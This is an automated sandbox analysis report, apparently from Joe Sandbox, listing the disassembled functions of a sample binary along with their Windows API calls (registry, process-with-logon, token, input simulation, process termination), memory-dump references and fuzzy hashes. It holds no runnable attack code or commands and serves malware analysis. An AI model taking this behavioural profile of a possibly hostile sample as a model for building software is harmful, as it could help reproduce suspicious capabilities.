                                                                              • Opcode ID: 8a389d195d85f92800fd3567df546589c6ad221c7cae6ac5dae5445dc0ecab2d
                                                                              • Instruction ID: 7f4997fd52144fc8269a10bf9c637467e2e106dd6c598ec0a6e0853fd51a1078
                                                                              • Opcode Fuzzy Hash: 8a389d195d85f92800fd3567df546589c6ad221c7cae6ac5dae5445dc0ecab2d
                                                                              • Instruction Fuzzy Hash: E951A372A10226ABDB258E64CC41FAFB7EAEB446D4F154629FF05D7180EB74DC90CE90
                                                                              Function 004664B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: _memmove$__itow__swprintf
                                                                              • String ID:
                                                                              • API String ID: 3253778849-0
                                                                              • Opcode ID: 5bebe8ed2a5bd69edc0496f69af5ac54aa813bc85d82d6a06f8f7627e15d20aa
                                                                              • Instruction ID: 21da70feb02ff46742cf7b1a596b1e1f747712b30ca55ffc0ed3d6fa2aea8e56
                                                                              • Opcode Fuzzy Hash: 5bebe8ed2a5bd69edc0496f69af5ac54aa813bc85d82d6a06f8f7627e15d20aa
                                                                              • Instruction Fuzzy Hash: 6261707160025A9BCF01EF61DC81AFE37A5AF05308F45452EF8556B293EB38AD05CB5A
                                                                              Function 004801E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004802BD
                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004802FD
                                                                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00480320
                                                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00480349
                                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0048038C
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00480399
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                              • String ID:
                                                                              • API String ID: 4046560759-0
                                                                              • Opcode ID: f1dcb639eea8d90ae34e050d64b0ddba3d3a8ac6fd9179947004fb3c6f1f970b
                                                                              • Instruction ID: d871ff08e979a7a46cd08627f86c845b9cb8169993b1d7d4ad27b4e2648fe78e
                                                                              • Opcode Fuzzy Hash: f1dcb639eea8d90ae34e050d64b0ddba3d3a8ac6fd9179947004fb3c6f1f970b
                                                                              • Instruction Fuzzy Hash: 68515C71118204AFC710EF65C885E6FBBE8FF85318F04492EF945972A2DB35E909CB56
                                                                              Function 0045EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • VariantInit.OLEAUT32(?), ref: 0045EF06
                                                                              • VariantClear.OLEAUT32(00000013), ref: 0045EF78
                                                                              • VariantClear.OLEAUT32(00000000), ref: 0045EFD3
                                                                              • _memmove.LIBCMT ref: 0045EFFD
                                                                              • VariantClear.OLEAUT32(?), ref: 0045F04A
                                                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0045F078
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$Clear$ChangeInitType_memmove
                                                                              • String ID:
                                                                              • API String ID: 1101466143-0
                                                                              • Opcode ID: 3a696c756d5f9f21b3064a47137a411a2eda9f735d8382ec367d4cfec0c8664e
                                                                              • Instruction ID: 3df6c570488be2a998a5abfaea7cf2d50daf9fdb1352742cca5bf42246c3e2d0
                                                                              • Opcode Fuzzy Hash: 3a696c756d5f9f21b3064a47137a411a2eda9f735d8382ec367d4cfec0c8664e
                                                                              • Instruction Fuzzy Hash: 04517D75A00209EFCB14CF58C884AAAB7B8FF4C314B15856AED49DB342E334E915CF94
                                                                              Function 0046220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00462258
                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004622A3
                                                                              • IsMenu.USER32(00000000), ref: 004622C3
                                                                              • CreatePopupMenu.USER32 ref: 004622F7
                                                                              • GetMenuItemCount.USER32(000000FF), ref: 00462355
                                                                              • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00462386
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                              • String ID:
                                                                              • API String ID: 3311875123-0
                                                                              • Opcode ID: cf97df88117ddcc5f0fa513269a15dde7708b163d82bf74e49b6c8debfa24165
                                                                              • Instruction ID: 667f6c59849a63ea2ae133147cac6ec600f1389f3bfda063d60b04a3024e98c7
                                                                              • Opcode Fuzzy Hash: cf97df88117ddcc5f0fa513269a15dde7708b163d82bf74e49b6c8debfa24165
                                                                              • Instruction Fuzzy Hash: 0F51A370500649FBDF21CF64CA44B9EBBF5BF05318F10456AE81197390E3B88985CB5B
                                                                              Function 0048B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ShowWindow.USER32(004C57B0,00000000,00A5C970,?,?,004C57B0,?,0048B5A8,?,?), ref: 0048B712
                                                                              • EnableWindow.USER32(00000000,00000000), ref: 0048B736
                                                                              • ShowWindow.USER32(004C57B0,00000000,00A5C970,?,?,004C57B0,?,0048B5A8,?,?), ref: 0048B796
                                                                              • ShowWindow.USER32(00000000,00000004,?,0048B5A8,?,?), ref: 0048B7A8
                                                                              • EnableWindow.USER32(00000000,00000001), ref: 0048B7CC
                                                                              • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0048B7EF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Show$Enable$MessageSend
                                                                              • String ID:
                                                                              • API String ID: 642888154-0
                                                                              • Opcode ID: 7ca0fe6c9807323bcc0ac8ff00a913c3fb6576fd02a22b3a16232a66ac7b93cd
                                                                              • Instruction ID: 1d3b34d551e73e97491640bec01ce8c12bc83bc2c135b759935fb039f22faf4f
                                                                              • Opcode Fuzzy Hash: 7ca0fe6c9807323bcc0ac8ff00a913c3fb6576fd02a22b3a16232a66ac7b93cd
                                                                              • Instruction Fuzzy Hash: 1941A834600340AFDB21DF28C499B9A7BE0FF49310F5845BAF9488F762C735A856CB94
                                                                              Function 0047709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetForegroundWindow.USER32(?,?,?,?,?,?,00474E41,?,?,00000000,00000001), ref: 004770AC
                                                                                • Part of subcall function 004739A0: GetWindowRect.USER32(?,?), ref: 004739B3
                                                                              • GetDesktopWindow.USER32 ref: 004770D6
                                                                              • GetWindowRect.USER32(00000000), ref: 004770DD
                                                                              • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0047710F
                                                                                • Part of subcall function 00465244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004652BC
                                                                              • GetCursorPos.USER32(?), ref: 0047713B
                                                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00477199
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                              • String ID:
                                                                              • API String ID: 4137160315-0
                                                                              • Opcode ID: 3cdeb131284200fba8ef2e28f13c3857e1f37640968ff1f5e935f4a9860c8469
                                                                              • Instruction ID: 96178dbc809958a90b6454061f905f6e8cc6bb80431ab620535fad6e804f8cbf
                                                                              • Opcode Fuzzy Hash: 3cdeb131284200fba8ef2e28f13c3857e1f37640968ff1f5e935f4a9860c8469
                                                                              • Instruction Fuzzy Hash: 2131D472605305ABD720DF14D849B9FB7A9FF88314F40092EF58997291D734EA09CB9A
                                                                              Function 00458879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 004580A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004580C0
                                                                                • Part of subcall function 004580A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004580CA
                                                                                • Part of subcall function 004580A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004580D9
                                                                                • Part of subcall function 004580A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004580E0
                                                                                • Part of subcall function 004580A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004580F6
                                                                              • GetLengthSid.ADVAPI32(?,00000000,0045842F), ref: 004588CA
                                                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 004588D6
                                                                              • HeapAlloc.KERNEL32(00000000), ref: 004588DD
                                                                              • CopySid.ADVAPI32(00000000,00000000,?), ref: 004588F6
                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,0045842F), ref: 0045890A
                                                                              • HeapFree.KERNEL32(00000000), ref: 00458911
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                              • String ID:
                                                                              • API String ID: 3008561057-0
                                                                              • Opcode ID: 899df585734c4cf6e549910b9baf9cc1d52bbabddfc3f51843167315329ebb0f
                                                                              • Instruction ID: 7059436e0a451666cc74b436c7695f43cca8d294219cfb63d8684b6348989bdb
                                                                              • Opcode Fuzzy Hash: 899df585734c4cf6e549910b9baf9cc1d52bbabddfc3f51843167315329ebb0f
                                                                              • Instruction Fuzzy Hash: 8E11AF71501609FFDB109FA4DC09BBFB7A8EB45316F10442EE845A7211CF3AAD18DB69
                                                                              Function 004585B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004585E2
                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 004585E9
                                                                              • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 004585F8
                                                                              • CloseHandle.KERNEL32(00000004), ref: 00458603
                                                                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00458632
                                                                              • DestroyEnvironmentBlock.USERENV(00000000), ref: 00458646
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                              • String ID:
                                                                              • API String ID: 1413079979-0
                                                                              • Opcode ID: 594d4e30fb024ea406b8e6751db59f03e6ebc423b2dce8d7814a5cb8bfdeea6b
                                                                              • Instruction ID: 159165bab53b04d3cbba9e0d8ed23f629fb96fbb8b96a1f823f3c86320dce82d
                                                                              • Opcode Fuzzy Hash: 594d4e30fb024ea406b8e6751db59f03e6ebc423b2dce8d7814a5cb8bfdeea6b
                                                                              • Instruction Fuzzy Hash: 7111597250120DBBDF018FA4DD49BEF7BA9EF08305F144069FE04A2161CB769E69EB64
                                                                              Function 02F5185B Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$_free$_abort
                                                                              • String ID:
                                                                              • API String ID: 3160817290-0
                                                                              • Opcode ID: 44d819e571c598b199d798392a32077c6161e4a562c2913c3869324d17ad7c4b
                                                                              • Instruction ID: e7cba0e32a71c27194ab0274794a6472bb33f7cabf31f05130942fb3ee4da32d
                                                                              • Opcode Fuzzy Hash: 44d819e571c598b199d798392a32077c6161e4a562c2913c3869324d17ad7c4b
                                                                              • Instruction Fuzzy Hash: 64F0D136A8573426D32136756C08F2B36979FC2BE2B240724FF1E92280EF6998128950
                                                                              Function 00420162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00420193
                                                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 0042019B
                                                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004201A6
                                                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004201B1
                                                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 004201B9
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 004201C1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Virtual
                                                                              • String ID:
                                                                              • API String ID: 4278518827-0
                                                                              • Opcode ID: 8005da6f0a239fe7bb2d9a35262dc9c54b025e1879980d73ce2b9003a515eafd
                                                                              • Instruction ID: 92342a6601e26d0a7fde7352a7d9a4d166513956845c1039e3d7dfd742296845
                                                                              • Opcode Fuzzy Hash: 8005da6f0a239fe7bb2d9a35262dc9c54b025e1879980d73ce2b9003a515eafd
                                                                              • Instruction Fuzzy Hash: BC016CB09017597DE3008F5A8C85B56FFA8FF19354F00411FA15C87941C7F5A868CBE5
                                                                              Function 004653E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 004653F9
                                                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0046540F
                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 0046541E
                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0046542D
                                                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00465437
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0046543E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                              • String ID:
                                                                              • API String ID: 839392675-0
                                                                              • Opcode ID: 0a014705f4b9eef04d7cbb572d47effba07f9213880d12d67749b825beda7cb3
                                                                              • Instruction ID: 8521796c5e9ebcca20b77e734ec20d152baa00e403791343a5e797bd2ed800e1
                                                                              • Opcode Fuzzy Hash: 0a014705f4b9eef04d7cbb572d47effba07f9213880d12d67749b825beda7cb3
                                                                              • Instruction Fuzzy Hash: 7EF06231240558BBD3215B929C0DEAF7A7CEFC6B11F00057DF904D1050EBA41A0587B9
                                                                              Function 00467230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InterlockedExchange.KERNEL32(?,?), ref: 00467243
                                                                              • EnterCriticalSection.KERNEL32(?,?,00410EE4,?,?), ref: 00467254
                                                                              • TerminateThread.KERNEL32(00000000,000001F6,?,00410EE4,?,?), ref: 00467261
                                                                              • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00410EE4,?,?), ref: 0046726E
                                                                                • Part of subcall function 00466C35: CloseHandle.KERNEL32(00000000,?,0046727B,?,00410EE4,?,?), ref: 00466C3F
                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00467281
                                                                              • LeaveCriticalSection.KERNEL32(?,?,00410EE4,?,?), ref: 00467288
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                              • String ID:
                                                                              • API String ID: 3495660284-0
                                                                              • Opcode ID: 007701f69a9d5ed9de85b122c5e4605bf6e21b132c868c5f449004ca5f003f85
                                                                              • Instruction ID: 24fb6cd7f7b8029ee4f25158e92bed301f8e8da2948c51d11c28ada49318010c
                                                                              • Opcode Fuzzy Hash: 007701f69a9d5ed9de85b122c5e4605bf6e21b132c868c5f449004ca5f003f85
                                                                              • Instruction Fuzzy Hash: DDF08236540A12EBD7111B64ED4C9DF7739FF45702B1009BAF503A10A0DB7F5819CB59
                                                                              Function 00458992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0045899D
                                                                              • UnloadUserProfile.USERENV(?,?), ref: 004589A9
                                                                              • CloseHandle.KERNEL32(?), ref: 004589B2
                                                                              • CloseHandle.KERNEL32(?), ref: 004589BA
                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 004589C3
                                                                              • HeapFree.KERNEL32(00000000), ref: 004589CA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
